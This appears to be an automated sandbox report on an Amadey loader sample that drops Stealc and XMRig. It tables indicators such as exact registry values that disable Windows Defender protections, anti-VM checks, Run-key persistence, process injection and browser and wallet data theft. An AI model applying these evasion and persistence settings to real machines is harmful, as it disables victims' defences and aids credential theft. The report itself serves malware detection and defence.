amadey | 0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	1b2099865d.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	1b2099865d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	1b2099865d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	1b2099865d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	1b2099865d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	1b2099865d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	1b2099865d.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	1b2099865d.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	1b2099865d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	1b2099865d.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	06444ff627.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2fb82efe10.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e0e6a0a986.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	03afcae3d4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ac52c9b182.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e995614d26.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1b2099865d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FZJ598DYGU8NGCWNA.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/3576-2097-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3576-2098-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3576-2104-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3576-2105-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3576-2102-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3576-2101-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3576-2100-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2124	powershell.exe
5940	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
4400	bitsadmin.exe

Downloads MZ/PE file 16 IoCs

flow	pid	Process
28	1128	rapes.exe
28	1128	rapes.exe
39	4236	BitLockerToGo.exe
67	1128	rapes.exe
67	1128	rapes.exe
67	1128	rapes.exe
67	1128	rapes.exe
67	1128	rapes.exe
67	1128	rapes.exe
67	1128	rapes.exe
67	1128	rapes.exe
67	1128	rapes.exe
67	1128	rapes.exe
67	1128	rapes.exe
71	1232	BitLockerToGo.exe
206	2056	03afcae3d4.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 28 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FZJ598DYGU8NGCWNA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	06444ff627.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2fb82efe10.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e0e6a0a986.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1b2099865d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FZJ598DYGU8NGCWNA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e0e6a0a986.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e995614d26.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e995614d26.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	03afcae3d4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	03afcae3d4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2fb82efe10.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ac52c9b182.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ac52c9b182.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1b2099865d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	06444ff627.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	rapes.exe

Executes dropped EXE 29 IoCs

pid	Process
1128	rapes.exe
2132	06444ff627.exe
4832	7f28b9078c.exe
2316	7f28b9078c.exe
3912	7f28b9078c.exe
1924	7f28b9078c.exe
3920	rapes.exe
1252	2fb82efe10.exe
4632	e995614d26.exe
640	e0e6a0a986.exe
4612	rapes.exe
2056	03afcae3d4.exe
1816	ac52c9b182.exe
3128	d589453c73.exe
5256	1b2099865d.exe
5628	v6Oqdnc.exe
5716	FZJ598DYGU8NGCWNA.exe
5164	OEHBOHk.exe
2912	MCxU5Fj.exe
5112	MCxU5Fj.exe
4436	MCxU5Fj.exe
1328	MCxU5Fj.exe
5744	ckonftponqgz.exe
5408	rapes.exe
4860	Y87Oyyz.exe
6068	Y87Oyyz.exe
3880	SplashWin.exe
3524	SplashWin.exe
3692	zY9sqWs.exe

Identifies Wine through registry keys 2 TTPs 14 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	2fb82efe10.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	e995614d26.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	e0e6a0a986.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	03afcae3d4.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	ac52c9b182.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	1b2099865d.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	v6Oqdnc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	06444ff627.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	FZJ598DYGU8NGCWNA.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	rapes.exe

Loads dropped DLL 7 IoCs

pid	Process
6068	Y87Oyyz.exe
3880	SplashWin.exe
3880	SplashWin.exe
3880	SplashWin.exe
3524	SplashWin.exe
3524	SplashWin.exe
3524	SplashWin.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	1b2099865d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	1b2099865d.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ac52c9b182.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105150101\\ac52c9b182.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d589453c73.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105160101\\d589453c73.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1b2099865d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105170101\\1b2099865d.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\03afcae3d4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105140101\\03afcae3d4.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
6084	powercfg.exe
6016	powercfg.exe
6088	powercfg.exe
1784	powercfg.exe
5424	powercfg.exe
1052	powercfg.exe
6080	powercfg.exe
6072	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000b000000023c6c-297.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	ckonftponqgz.exe
File opened for modification	C:\Windows\system32\MRT.exe	OEHBOHk.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs

pid	Process
4572	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
1128	rapes.exe
2132	06444ff627.exe
3920	rapes.exe
1252	2fb82efe10.exe
4632	e995614d26.exe
640	e0e6a0a986.exe
4612	rapes.exe
2056	03afcae3d4.exe
1816	ac52c9b182.exe
5256	1b2099865d.exe
5628	v6Oqdnc.exe
5716	FZJ598DYGU8NGCWNA.exe
5408	rapes.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 4832 set thread context of 1924	4832	7f28b9078c.exe	107
PID 2132 set thread context of 4236	2132	06444ff627.exe	112
PID 1252 set thread context of 1232	1252	2fb82efe10.exe	119
PID 2912 set thread context of 1328	2912	MCxU5Fj.exe	161
PID 5744 set thread context of 6044	5744	ckonftponqgz.exe	194
PID 5744 set thread context of 3576	5744	ckonftponqgz.exe	199
PID 3524 set thread context of 4944	3524	SplashWin.exe	206

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3576-2088-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3576-2097-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3576-2098-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3576-2104-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3576-2105-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3576-2102-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3576-2101-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3576-2100-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3576-2091-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3576-2090-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3576-2089-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3576-2087-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6068	sc.exe
1760	sc.exe
3352	sc.exe
3060	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2548	4832	WerFault.exe	104
5332	2912	WerFault.exe	158

System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7f28b9078c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ac52c9b182.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Y87Oyyz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2fb82efe10.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1b2099865d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FZJ598DYGU8NGCWNA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fltMC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	06444ff627.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7f28b9078c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Y87Oyyz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e0e6a0a986.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	03afcae3d4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d589453c73.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	d589453c73.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e995614d26.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	d589453c73.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zY9sqWs.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
1996	taskkill.exe
5016	taskkill.exe
4068	taskkill.exe
3988	taskkill.exe
4904	taskkill.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings	rapes.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4572	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
